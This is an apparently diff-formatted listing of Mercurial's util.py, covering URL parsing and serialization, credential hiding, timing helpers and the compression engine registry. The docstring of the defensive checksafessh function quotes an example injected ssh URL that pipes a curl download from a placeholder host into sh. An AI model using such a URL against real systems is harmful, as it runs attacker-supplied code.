2937 # leave the query string escaped
2933 for a in ('user', 'passwd', 'host', 'port',
2938 for a in ('user', 'passwd', 'host', 'port',
2934 'path', 'fragment'):
2939 'path', 'fragment'):
2935 v = getattr(self, a)
2940 v = getattr(self, a)
2936 if v is not None:
2941 if v is not None:
2937 setattr(self, a, urlreq.unquote(v))
2942 setattr(self, a, urlreq.unquote(v))
2938
2943
2939 @encoding.strmethod
2944 @encoding.strmethod
2940 def __repr__(self):
2945 def __repr__(self):
2941 attrs = []
2946 attrs = []
2942 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2947 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2943 'query', 'fragment'):
2948 'query', 'fragment'):
2944 v = getattr(self, a)
2949 v = getattr(self, a)
2945 if v is not None:
2950 if v is not None:
2946 attrs.append('%s: %r' % (a, v))
2951 attrs.append('%s: %r' % (a, v))
2947 return '<url %s>' % ', '.join(attrs)
2952 return '<url %s>' % ', '.join(attrs)
2948
2953
2949 def __bytes__(self):
2954 def __bytes__(self):
2950 r"""Join the URL's components back into a URL string.
2955 r"""Join the URL's components back into a URL string.
2951
2956
2952 Examples:
2957 Examples:
2953
2958
2954 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2959 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2955 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2960 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2957 'http://user:pw@host:80/?foo=bar&baz=42'
2962 'http://user:pw@host:80/?foo=bar&baz=42'
2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2963 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2959 'http://user:pw@host:80/?foo=bar%3dbaz'
2964 'http://user:pw@host:80/?foo=bar%3dbaz'
2960 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2965 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2961 'ssh://user:pw@[::1]:2200//home/joe#'
2966 'ssh://user:pw@[::1]:2200//home/joe#'
2962 >>> bytes(url(b'http://localhost:80//'))
2967 >>> bytes(url(b'http://localhost:80//'))
2963 'http://localhost:80//'
2968 'http://localhost:80//'
2964 >>> bytes(url(b'http://localhost:80/'))
2969 >>> bytes(url(b'http://localhost:80/'))
2965 'http://localhost:80/'
2970 'http://localhost:80/'
2966 >>> bytes(url(b'http://localhost:80'))
2971 >>> bytes(url(b'http://localhost:80'))
2967 'http://localhost:80/'
2972 'http://localhost:80/'
2968 >>> bytes(url(b'bundle:foo'))
2973 >>> bytes(url(b'bundle:foo'))
2969 'bundle:foo'
2974 'bundle:foo'
2970 >>> bytes(url(b'bundle://../foo'))
2975 >>> bytes(url(b'bundle://../foo'))
2971 'bundle:../foo'
2976 'bundle:../foo'
2972 >>> bytes(url(b'path'))
2977 >>> bytes(url(b'path'))
2973 'path'
2978 'path'
2974 >>> bytes(url(b'file:///tmp/foo/bar'))
2979 >>> bytes(url(b'file:///tmp/foo/bar'))
2975 'file:///tmp/foo/bar'
2980 'file:///tmp/foo/bar'
2976 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2981 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2977 'file:///c:/tmp/foo/bar'
2982 'file:///c:/tmp/foo/bar'
2978 >>> print(url(br'bundle:foo\bar'))
2983 >>> print(url(br'bundle:foo\bar'))
2979 bundle:foo\bar
2984 bundle:foo\bar
2980 >>> print(url(br'file:///D:\data\hg'))
2985 >>> print(url(br'file:///D:\data\hg'))
2981 file:///D:\data\hg
2986 file:///D:\data\hg
2982 """
2987 """
2983 if self._localpath:
2988 if self._localpath:
2984 s = self.path
2989 s = self.path
2985 if self.scheme == 'bundle':
2990 if self.scheme == 'bundle':
2986 s = 'bundle:' + s
2991 s = 'bundle:' + s
2987 if self.fragment:
2992 if self.fragment:
2988 s += '#' + self.fragment
2993 s += '#' + self.fragment
2989 return s
2994 return s
2990
2995
2991 s = self.scheme + ':'
2996 s = self.scheme + ':'
2992 if self.user or self.passwd or self.host:
2997 if self.user or self.passwd or self.host:
2993 s += '//'
2998 s += '//'
2994 elif self.scheme and (not self.path or self.path.startswith('/')
2999 elif self.scheme and (not self.path or self.path.startswith('/')
2995 or hasdriveletter(self.path)):
3000 or hasdriveletter(self.path)):
2996 s += '//'
3001 s += '//'
2997 if hasdriveletter(self.path):
3002 if hasdriveletter(self.path):
2998 s += '/'
3003 s += '/'
2999 if self.user:
3004 if self.user:
3000 s += urlreq.quote(self.user, safe=self._safechars)
3005 s += urlreq.quote(self.user, safe=self._safechars)
3001 if self.passwd:
3006 if self.passwd:
3002 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3007 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3003 if self.user or self.passwd:
3008 if self.user or self.passwd:
3004 s += '@'
3009 s += '@'
3005 if self.host:
3010 if self.host:
3006 if not (self.host.startswith('[') and self.host.endswith(']')):
3011 if not (self.host.startswith('[') and self.host.endswith(']')):
3007 s += urlreq.quote(self.host)
3012 s += urlreq.quote(self.host)
3008 else:
3013 else:
3009 s += self.host
3014 s += self.host
3010 if self.port:
3015 if self.port:
3011 s += ':' + urlreq.quote(self.port)
3016 s += ':' + urlreq.quote(self.port)
3012 if self.host:
3017 if self.host:
3013 s += '/'
3018 s += '/'
3014 if self.path:
3019 if self.path:
3015 # TODO: similar to the query string, we should not unescape the
3020 # TODO: similar to the query string, we should not unescape the
3016 # path when we store it, the path might contain '%2f' = '/',
3021 # path when we store it, the path might contain '%2f' = '/',
3017 # which we should *not* escape.
3022 # which we should *not* escape.
3018 s += urlreq.quote(self.path, safe=self._safepchars)
3023 s += urlreq.quote(self.path, safe=self._safepchars)
3019 if self.query:
3024 if self.query:
3020 # we store the query in escaped form.
3025 # we store the query in escaped form.
3021 s += '?' + self.query
3026 s += '?' + self.query
3022 if self.fragment is not None:
3027 if self.fragment is not None:
3023 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3028 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3024 return s
3029 return s
3025
3030
3026 __str__ = encoding.strmethod(__bytes__)
3031 __str__ = encoding.strmethod(__bytes__)
3027
3032
3028 def authinfo(self):
3033 def authinfo(self):
3029 user, passwd = self.user, self.passwd
3034 user, passwd = self.user, self.passwd
3030 try:
3035 try:
3031 self.user, self.passwd = None, None
3036 self.user, self.passwd = None, None
3032 s = bytes(self)
3037 s = bytes(self)
3033 finally:
3038 finally:
3034 self.user, self.passwd = user, passwd
3039 self.user, self.passwd = user, passwd
3035 if not self.user:
3040 if not self.user:
3036 return (s, None)
3041 return (s, None)
3037 # authinfo[1] is passed to urllib2 password manager, and its
3042 # authinfo[1] is passed to urllib2 password manager, and its
3038 # URIs must not contain credentials. The host is passed in the
3043 # URIs must not contain credentials. The host is passed in the
3039 # URIs list because Python < 2.4.3 uses only that to search for
3044 # URIs list because Python < 2.4.3 uses only that to search for
3040 # a password.
3045 # a password.
3041 return (s, (None, (s, self.host),
3046 return (s, (None, (s, self.host),
3042 self.user, self.passwd or ''))
3047 self.user, self.passwd or ''))
3043
3048
3044 def isabs(self):
3049 def isabs(self):
3045 if self.scheme and self.scheme != 'file':
3050 if self.scheme and self.scheme != 'file':
3046 return True # remote URL
3051 return True # remote URL
3047 if hasdriveletter(self.path):
3052 if hasdriveletter(self.path):
3048 return True # absolute for our purposes - can't be joined()
3053 return True # absolute for our purposes - can't be joined()
3049 if self.path.startswith(br'\\'):
3054 if self.path.startswith(br'\\'):
3050 return True # Windows UNC path
3055 return True # Windows UNC path
3051 if self.path.startswith('/'):
3056 if self.path.startswith('/'):
3052 return True # POSIX-style
3057 return True # POSIX-style
3053 return False
3058 return False
3054
3059
3055 def localpath(self):
3060 def localpath(self):
3056 if self.scheme == 'file' or self.scheme == 'bundle':
3061 if self.scheme == 'file' or self.scheme == 'bundle':
3057 path = self.path or '/'
3062 path = self.path or '/'
3058 # For Windows, we need to promote hosts containing drive
3063 # For Windows, we need to promote hosts containing drive
3059 # letters to paths with drive letters.
3064 # letters to paths with drive letters.
3060 if hasdriveletter(self._hostport):
3065 if hasdriveletter(self._hostport):
3061 path = self._hostport + '/' + self.path
3066 path = self._hostport + '/' + self.path
3062 elif (self.host is not None and self.path
3067 elif (self.host is not None and self.path
3063 and not hasdriveletter(path)):
3068 and not hasdriveletter(path)):
3064 path = '/' + path
3069 path = '/' + path
3065 return path
3070 return path
3066 return self._origpath
3071 return self._origpath
3067
3072
3068 def islocal(self):
3073 def islocal(self):
3069 '''whether localpath will return something that posixfile can open'''
3074 '''whether localpath will return something that posixfile can open'''
3070 return (not self.scheme or self.scheme == 'file'
3075 return (not self.scheme or self.scheme == 'file'
3071 or self.scheme == 'bundle')
3076 or self.scheme == 'bundle')
3072
3077
3073 def hasscheme(path):
3078 def hasscheme(path):
3074 return bool(url(path).scheme)
3079 return bool(url(path).scheme)
3075
3080
3076 def hasdriveletter(path):
3081 def hasdriveletter(path):
3077 return path and path[1:2] == ':' and path[0:1].isalpha()
3082 return path and path[1:2] == ':' and path[0:1].isalpha()
3078
3083
3079 def urllocalpath(path):
3084 def urllocalpath(path):
3080 return url(path, parsequery=False, parsefragment=False).localpath()
3085 return url(path, parsequery=False, parsefragment=False).localpath()
3081
3086
3082 def checksafessh(path):
3087 def checksafessh(path):
3083 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3088 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3084
3089
3085 This is a sanity check for ssh urls. ssh will parse the first item as
3090 This is a sanity check for ssh urls. ssh will parse the first item as
3086 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3091 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3087 Let's prevent these potentially exploited urls entirely and warn the
3092 Let's prevent these potentially exploited urls entirely and warn the
3088 user.
3093 user.
3089
3094
3090 Raises an error.Abort when the url is unsafe.
3095 Raises an error.Abort when the url is unsafe.
3091 """
3096 """
3092 path = urlreq.unquote(path)
3097 path = urlreq.unquote(path)
3093 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3098 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3094 raise error.Abort(_('potentially unsafe url: %r') %
3099 raise error.Abort(_('potentially unsafe url: %r') %
3095 (path,))
3100 (path,))
3096
3101
3097 def hidepassword(u):
3102 def hidepassword(u):
3098 '''hide user credential in a url string'''
3103 '''hide user credential in a url string'''
3099 u = url(u)
3104 u = url(u)
3100 if u.passwd:
3105 if u.passwd:
3101 u.passwd = '***'
3106 u.passwd = '***'
3102 return bytes(u)
3107 return bytes(u)
3103
3108
3104 def removeauth(u):
3109 def removeauth(u):
3105 '''remove all authentication information from a url string'''
3110 '''remove all authentication information from a url string'''
3106 u = url(u)
3111 u = url(u)
3107 u.user = u.passwd = None
3112 u.user = u.passwd = None
3108 return str(u)
3113 return str(u)
3109
3114
3110 timecount = unitcountfn(
3115 timecount = unitcountfn(
3111 (1, 1e3, _('%.0f s')),
3116 (1, 1e3, _('%.0f s')),
3112 (100, 1, _('%.1f s')),
3117 (100, 1, _('%.1f s')),
3113 (10, 1, _('%.2f s')),
3118 (10, 1, _('%.2f s')),
3114 (1, 1, _('%.3f s')),
3119 (1, 1, _('%.3f s')),
3115 (100, 0.001, _('%.1f ms')),
3120 (100, 0.001, _('%.1f ms')),
3116 (10, 0.001, _('%.2f ms')),
3121 (10, 0.001, _('%.2f ms')),
3117 (1, 0.001, _('%.3f ms')),
3122 (1, 0.001, _('%.3f ms')),
3118 (100, 0.000001, _('%.1f us')),
3123 (100, 0.000001, _('%.1f us')),
3119 (10, 0.000001, _('%.2f us')),
3124 (10, 0.000001, _('%.2f us')),
3120 (1, 0.000001, _('%.3f us')),
3125 (1, 0.000001, _('%.3f us')),
3121 (100, 0.000000001, _('%.1f ns')),
3126 (100, 0.000000001, _('%.1f ns')),
3122 (10, 0.000000001, _('%.2f ns')),
3127 (10, 0.000000001, _('%.2f ns')),
3123 (1, 0.000000001, _('%.3f ns')),
3128 (1, 0.000000001, _('%.3f ns')),
3124 )
3129 )
3125
3130
3126 _timenesting = [0]
3131 _timenesting = [0]
3127
3132
3128 def timed(func):
3133 def timed(func):
3129 '''Report the execution time of a function call to stderr.
3134 '''Report the execution time of a function call to stderr.
3130
3135
3131 During development, use as a decorator when you need to measure
3136 During development, use as a decorator when you need to measure
3132 the cost of a function, e.g. as follows:
3137 the cost of a function, e.g. as follows:
3133
3138
3134 @util.timed
3139 @util.timed
3135 def foo(a, b, c):
3140 def foo(a, b, c):
3136 pass
3141 pass
3137 '''
3142 '''
3138
3143
3139 def wrapper(*args, **kwargs):
3144 def wrapper(*args, **kwargs):
3140 start = timer()
3145 start = timer()
3141 indent = 2
3146 indent = 2
3142 _timenesting[0] += indent
3147 _timenesting[0] += indent
3143 try:
3148 try:
3144 return func(*args, **kwargs)
3149 return func(*args, **kwargs)
3145 finally:
3150 finally:
3146 elapsed = timer() - start
3151 elapsed = timer() - start
3147 _timenesting[0] -= indent
3152 _timenesting[0] -= indent
3148 stderr.write('%s%s: %s\n' %
3153 stderr.write('%s%s: %s\n' %
3149 (' ' * _timenesting[0], func.__name__,
3154 (' ' * _timenesting[0], func.__name__,
3150 timecount(elapsed)))
3155 timecount(elapsed)))
3151 return wrapper
3156 return wrapper
3152
3157
3153 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3158 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3154 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3159 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3155
3160
3156 def sizetoint(s):
3161 def sizetoint(s):
3157 '''Convert a space specifier to a byte count.
3162 '''Convert a space specifier to a byte count.
3158
3163
3159 >>> sizetoint(b'30')
3164 >>> sizetoint(b'30')
3160 30
3165 30
3161 >>> sizetoint(b'2.2kb')
3166 >>> sizetoint(b'2.2kb')
3162 2252
3167 2252
3163 >>> sizetoint(b'6M')
3168 >>> sizetoint(b'6M')
3164 6291456
3169 6291456
3165 '''
3170 '''
3166 t = s.strip().lower()
3171 t = s.strip().lower()
3167 try:
3172 try:
3168 for k, u in _sizeunits:
3173 for k, u in _sizeunits:
3169 if t.endswith(k):
3174 if t.endswith(k):
3170 return int(float(t[:-len(k)]) * u)
3175 return int(float(t[:-len(k)]) * u)
3171 return int(t)
3176 return int(t)
3172 except ValueError:
3177 except ValueError:
3173 raise error.ParseError(_("couldn't parse size: %s") % s)
3178 raise error.ParseError(_("couldn't parse size: %s") % s)
3174
3179
3175 class hooks(object):
3180 class hooks(object):
3176 '''A collection of hook functions that can be used to extend a
3181 '''A collection of hook functions that can be used to extend a
3177 function's behavior. Hooks are called in lexicographic order,
3182 function's behavior. Hooks are called in lexicographic order,
3178 based on the names of their sources.'''
3183 based on the names of their sources.'''
3179
3184
3180 def __init__(self):
3185 def __init__(self):
3181 self._hooks = []
3186 self._hooks = []
3182
3187
3183 def add(self, source, hook):
3188 def add(self, source, hook):
3184 self._hooks.append((source, hook))
3189 self._hooks.append((source, hook))
3185
3190
3186 def __call__(self, *args):
3191 def __call__(self, *args):
3187 self._hooks.sort(key=lambda x: x[0])
3192 self._hooks.sort(key=lambda x: x[0])
3188 results = []
3193 results = []
3189 for source, hook in self._hooks:
3194 for source, hook in self._hooks:
3190 results.append(hook(*args))
3195 results.append(hook(*args))
3191 return results
3196 return results
3192
3197
3193 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3198 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3194 '''Yields lines for a nicely formatted stacktrace.
3199 '''Yields lines for a nicely formatted stacktrace.
3195 Skips the 'skip' last entries, then return the last 'depth' entries.
3200 Skips the 'skip' last entries, then return the last 'depth' entries.
3196 Each file+linenumber is formatted according to fileline.
3201 Each file+linenumber is formatted according to fileline.
3197 Each line is formatted according to line.
3202 Each line is formatted according to line.
3198 If line is None, it yields:
3203 If line is None, it yields:
3199 length of longest filepath+line number,
3204 length of longest filepath+line number,
3200 filepath+linenumber,
3205 filepath+linenumber,
3201 function
3206 function
3202
3207
3203 Not be used in production code but very convenient while developing.
3208 Not be used in production code but very convenient while developing.
3204 '''
3209 '''
3205 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3210 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3206 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3211 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3207 ][-depth:]
3212 ][-depth:]
3208 if entries:
3213 if entries:
3209 fnmax = max(len(entry[0]) for entry in entries)
3214 fnmax = max(len(entry[0]) for entry in entries)
3210 for fnln, func in entries:
3215 for fnln, func in entries:
3211 if line is None:
3216 if line is None:
3212 yield (fnmax, fnln, func)
3217 yield (fnmax, fnln, func)
3213 else:
3218 else:
3214 yield line % (fnmax, fnln, func)
3219 yield line % (fnmax, fnln, func)
3215
3220
3216 def debugstacktrace(msg='stacktrace', skip=0,
3221 def debugstacktrace(msg='stacktrace', skip=0,
3217 f=stderr, otherf=stdout, depth=0):
3222 f=stderr, otherf=stdout, depth=0):
3218 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3223 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3219 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3224 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3220 By default it will flush stdout first.
3225 By default it will flush stdout first.
3221 It can be used everywhere and intentionally does not require an ui object.
3226 It can be used everywhere and intentionally does not require an ui object.
3222 Not be used in production code but very convenient while developing.
3227 Not be used in production code but very convenient while developing.
3223 '''
3228 '''
3224 if otherf:
3229 if otherf:
3225 otherf.flush()
3230 otherf.flush()
3226 f.write('%s at:\n' % msg.rstrip())
3231 f.write('%s at:\n' % msg.rstrip())
3227 for line in getstackframes(skip + 1, depth=depth):
3232 for line in getstackframes(skip + 1, depth=depth):
3228 f.write(line)
3233 f.write(line)
3229 f.flush()
3234 f.flush()
3230
3235
3231 class dirs(object):
3236 class dirs(object):
3232 '''a multiset of directory names from a dirstate or manifest'''
3237 '''a multiset of directory names from a dirstate or manifest'''
3233
3238
3234 def __init__(self, map, skip=None):
3239 def __init__(self, map, skip=None):
3235 self._dirs = {}
3240 self._dirs = {}
3236 addpath = self.addpath
3241 addpath = self.addpath
3237 if safehasattr(map, 'iteritems') and skip is not None:
3242 if safehasattr(map, 'iteritems') and skip is not None:
3238 for f, s in map.iteritems():
3243 for f, s in map.iteritems():
3239 if s[0] != skip:
3244 if s[0] != skip:
3240 addpath(f)
3245 addpath(f)
3241 else:
3246 else:
3242 for f in map:
3247 for f in map:
3243 addpath(f)
3248 addpath(f)
3244
3249
3245 def addpath(self, path):
3250 def addpath(self, path):
3246 dirs = self._dirs
3251 dirs = self._dirs
3247 for base in finddirs(path):
3252 for base in finddirs(path):
3248 if base in dirs:
3253 if base in dirs:
3249 dirs[base] += 1
3254 dirs[base] += 1
3250 return
3255 return
3251 dirs[base] = 1
3256 dirs[base] = 1
3252
3257
3253 def delpath(self, path):
3258 def delpath(self, path):
3254 dirs = self._dirs
3259 dirs = self._dirs
3255 for base in finddirs(path):
3260 for base in finddirs(path):
3256 if dirs[base] > 1:
3261 if dirs[base] > 1:
3257 dirs[base] -= 1
3262 dirs[base] -= 1
3258 return
3263 return
3259 del dirs[base]
3264 del dirs[base]
3260
3265
3261 def __iter__(self):
3266 def __iter__(self):
3262 return iter(self._dirs)
3267 return iter(self._dirs)
3263
3268
3264 def __contains__(self, d):
3269 def __contains__(self, d):
3265 return d in self._dirs
3270 return d in self._dirs
3266
3271
3267 if safehasattr(parsers, 'dirs'):
3272 if safehasattr(parsers, 'dirs'):
3268 dirs = parsers.dirs
3273 dirs = parsers.dirs
3269
3274
3270 def finddirs(path):
3275 def finddirs(path):
3271 pos = path.rfind('/')
3276 pos = path.rfind('/')
3272 while pos != -1:
3277 while pos != -1:
3273 yield path[:pos]
3278 yield path[:pos]
3274 pos = path.rfind('/', 0, pos)
3279 pos = path.rfind('/', 0, pos)
3275
3280
3276 # compression code
3281 # compression code
3277
3282
3278 SERVERROLE = 'server'
3283 SERVERROLE = 'server'
3279 CLIENTROLE = 'client'
3284 CLIENTROLE = 'client'
3280
3285
3281 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3286 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3282 (u'name', u'serverpriority',
3287 (u'name', u'serverpriority',
3283 u'clientpriority'))
3288 u'clientpriority'))
3284
3289
3285 class compressormanager(object):
3290 class compressormanager(object):
3286 """Holds registrations of various compression engines.
3291 """Holds registrations of various compression engines.
3287
3292
3288 This class essentially abstracts the differences between compression
3293 This class essentially abstracts the differences between compression
3289 engines to allow new compression formats to be added easily, possibly from
3294 engines to allow new compression formats to be added easily, possibly from
3290 extensions.
3295 extensions.
3291
3296
3292 Compressors are registered against the global instance by calling its
3297 Compressors are registered against the global instance by calling its
3293 ``register()`` method.
3298 ``register()`` method.
3294 """
3299 """
3295 def __init__(self):
3300 def __init__(self):
3296 self._engines = {}
3301 self._engines = {}
3297 # Bundle spec human name to engine name.
3302 # Bundle spec human name to engine name.
3298 self._bundlenames = {}
3303 self._bundlenames = {}
3299 # Internal bundle identifier to engine name.
3304 # Internal bundle identifier to engine name.
3300 self._bundletypes = {}
3305 self._bundletypes = {}
3301 # Revlog header to engine name.
3306 # Revlog header to engine name.
3302 self._revlogheaders = {}
3307 self._revlogheaders = {}
3303 # Wire proto identifier to engine name.
3308 # Wire proto identifier to engine name.
3304 self._wiretypes = {}
3309 self._wiretypes = {}
3305
3310
3306 def __getitem__(self, key):
3311 def __getitem__(self, key):
3307 return self._engines[key]
3312 return self._engines[key]
3308
3313
3309 def __contains__(self, key):
3314 def __contains__(self, key):
3310 return key in self._engines
3315 return key in self._engines
3311
3316
3312 def __iter__(self):
3317 def __iter__(self):
3313 return iter(self._engines.keys())
3318 return iter(self._engines.keys())
3314
3319
3315 def register(self, engine):
3320 def register(self, engine):
3316 """Register a compression engine with the manager.
3321 """Register a compression engine with the manager.
3317
3322
3318 The argument must be a ``compressionengine`` instance.
3323 The argument must be a ``compressionengine`` instance.
3319 """
3324 """
3320 if not isinstance(engine, compressionengine):
3325 if not isinstance(engine, compressionengine):
3321 raise ValueError(_('argument must be a compressionengine'))
3326 raise ValueError(_('argument must be a compressionengine'))
3322
3327
3323 name = engine.name()
3328 name = engine.name()
3324
3329
3325 if name in self._engines:
3330 if name in self._engines:
3326 raise error.Abort(_('compression engine %s already registered') %
3331 raise error.Abort(_('compression engine %s already registered') %
3327 name)
3332 name)
3328
3333
3329 bundleinfo = engine.bundletype()
3334 bundleinfo = engine.bundletype()
3330 if bundleinfo:
3335 if bundleinfo:
3331 bundlename, bundletype = bundleinfo
3336 bundlename, bundletype = bundleinfo
3332
3337
3333 if bundlename in self._bundlenames:
3338 if bundlename in self._bundlenames:
3334 raise error.Abort(_('bundle name %s already registered') %
3339 raise error.Abort(_('bundle name %s already registered') %
3335 bundlename)
3340 bundlename)
3336 if bundletype in self._bundletypes:
3341 if bundletype in self._bundletypes:
3337 raise error.Abort(_('bundle type %s already registered by %s') %
3342 raise error.Abort(_('bundle type %s already registered by %s') %
3338 (bundletype, self._bundletypes[bundletype]))
3343 (bundletype, self._bundletypes[bundletype]))
3339
3344
3340 # No external facing name declared.
3345 # No external facing name declared.
3341 if bundlename:
3346 if bundlename:
3342 self._bundlenames[bundlename] = name
3347 self._bundlenames[bundlename] = name
3343
3348
3344 self._bundletypes[bundletype] = name
3349 self._bundletypes[bundletype] = name
3345
3350
3346 wiresupport = engine.wireprotosupport()
3351 wiresupport = engine.wireprotosupport()
3347 if wiresupport:
3352 if wiresupport:
3348 wiretype = wiresupport.name
3353 wiretype = wiresupport.name
3349 if wiretype in self._wiretypes:
3354 if wiretype in self._wiretypes:
3350 raise error.Abort(_('wire protocol compression %s already '
3355 raise error.Abort(_('wire protocol compression %s already '
3351 'registered by %s') %
3356 'registered by %s') %
3352 (wiretype, self._wiretypes[wiretype]))
3357 (wiretype, self._wiretypes[wiretype]))
3353
3358
3354 self._wiretypes[wiretype] = name
3359 self._wiretypes[wiretype] = name
3355
3360
3356 revlogheader = engine.revlogheader()
3361 revlogheader = engine.revlogheader()
3357 if revlogheader and revlogheader in self._revlogheaders:
3362 if revlogheader and revlogheader in self._revlogheaders:
3358 raise error.Abort(_('revlog header %s already registered by %s') %
3363 raise error.Abort(_('revlog header %s already registered by %s') %
3359 (revlogheader, self._revlogheaders[revlogheader]))
3364 (revlogheader, self._revlogheaders[revlogheader]))
3360
3365
3361 if revlogheader:
3366 if revlogheader:
3362 self._revlogheaders[revlogheader] = name
3367 self._revlogheaders[revlogheader] = name
3363
3368
3364 self._engines[name] = engine
3369 self._engines[name] = engine
3365
3370
3366 @property
3371 @property
3367 def supportedbundlenames(self):
3372 def supportedbundlenames(self):
3368 return set(self._bundlenames.keys())
3373 return set(self._bundlenames.keys())
3369
3374
3370 @property
3375 @property
3371 def supportedbundletypes(self):
3376 def supportedbundletypes(self):
3372 return set(self._bundletypes.keys())
3377 return set(self._bundletypes.keys())
3373
3378
3374 def forbundlename(self, bundlename):
3379 def forbundlename(self, bundlename):
3375 """Obtain a compression engine registered to a bundle name.
3380 """Obtain a compression engine registered to a bundle name.
3376
3381
3377 Will raise KeyError if the bundle type isn't registered.
3382 Will raise KeyError if the bundle type isn't registered.
3378
3383
3379 Will abort if the engine is known but not available.
3384 Will abort if the engine is known but not available.
3380 """
3385 """
3381 engine = self._engines[self._bundlenames[bundlename]]
3386 engine = self._engines[self._bundlenames[bundlename]]
3382 if not engine.available():
3387 if not engine.available():
3383 raise error.Abort(_('compression engine %s could not be loaded') %
3388 raise error.Abort(_('compression engine %s could not be loaded') %
3384 engine.name())
3389 engine.name())
3385 return engine
3390 return engine
3386
3391
3387 def forbundletype(self, bundletype):
3392 def forbundletype(self, bundletype):
3388 """Obtain a compression engine registered to a bundle type.
3393 """Obtain a compression engine registered to a bundle type.
3389
3394
3390 Will raise KeyError if the bundle type isn't registered.
3395 Will raise KeyError if the bundle type isn't registered.
3391
3396
3392 Will abort if the engine is known but not available.
3397 Will abort if the engine is known but not available.
3393 """
3398 """
3394 engine = self._engines[self._bundletypes[bundletype]]
3399 engine = self._engines[self._bundletypes[bundletype]]
3395 if not engine.available():
3400 if not engine.available():
3396 raise error.Abort(_('compression engine %s could not be loaded') %
3401 raise error.Abort(_('compression engine %s could not be loaded') %
3397 engine.name())
3402 engine.name())
3398 return engine
3403 return engine
3399
3404
3400 def supportedwireengines(self, role, onlyavailable=True):
3405 def supportedwireengines(self, role, onlyavailable=True):
3401 """Obtain compression engines that support the wire protocol.
3406 """Obtain compression engines that support the wire protocol.
3402
3407
3403 Returns a list of engines in prioritized order, most desired first.
3408 Returns a list of engines in prioritized order, most desired first.
3404
3409
3405 If ``onlyavailable`` is set, filter out engines that can't be
3410 If ``onlyavailable`` is set, filter out engines that can't be
3406 loaded.
3411 loaded.
3407 """
3412 """
3408 assert role in (SERVERROLE, CLIENTROLE)
3413 assert role in (SERVERROLE, CLIENTROLE)
3409
3414
3410 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3415 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3411
3416
3412 engines = [self._engines[e] for e in self._wiretypes.values()]
3417 engines = [self._engines[e] for e in self._wiretypes.values()]
3413 if onlyavailable:
3418 if onlyavailable:
3414 engines = [e for e in engines if e.available()]
3419 engines = [e for e in engines if e.available()]
3415
3420
3416 def getkey(e):
3421 def getkey(e):
3417 # Sort first by priority, highest first. In case of tie, sort
3422 # Sort first by priority, highest first. In case of tie, sort
3418 # alphabetically. This is arbitrary, but ensures output is
3423 # alphabetically. This is arbitrary, but ensures output is
3419 # stable.
3424 # stable.
3420 w = e.wireprotosupport()
3425 w = e.wireprotosupport()
3421 return -1 * getattr(w, attr), w.name
3426 return -1 * getattr(w, attr), w.name
3422
3427
3423 return list(sorted(engines, key=getkey))
3428 return list(sorted(engines, key=getkey))
3424
3429
3425 def forwiretype(self, wiretype):
3430 def forwiretype(self, wiretype):
3426 engine = self._engines[self._wiretypes[wiretype]]
3431 engine = self._engines[self._wiretypes[wiretype]]
3427 if not engine.available():
3432 if not engine.available():
3428 raise error.Abort(_('compression engine %s could not be loaded') %
3433 raise error.Abort(_('compression engine %s could not be loaded') %
3429 engine.name())
3434 engine.name())
3430 return engine
3435 return engine
3431
3436
3432 def forrevlogheader(self, header):
3437 def forrevlogheader(self, header):
3433 """Obtain a compression engine registered to a revlog header.
3438 """Obtain a compression engine registered to a revlog header.
3434
3439
3435 Will raise KeyError if the revlog header value isn't registered.
3440 Will raise KeyError if the revlog header value isn't registered.
3436 """
3441 """
3437 return self._engines[self._revlogheaders[header]]
3442 return self._engines[self._revlogheaders[header]]
3438
3443
3439 compengines = compressormanager()
3444 compengines = compressormanager()
3440
3445
3441 class compressionengine(object):
3446 class compressionengine(object):
3442 """Base class for compression engines.
3447 """Base class for compression engines.
3443
3448
3444 Compression engines must implement the interface defined by this class.
3449 Compression engines must implement the interface defined by this class.
3445 """
3450 """
3446 def name(self):
3451 def name(self):
3447 """Returns the name of the compression engine.
3452 """Returns the name of the compression engine.
3448
3453
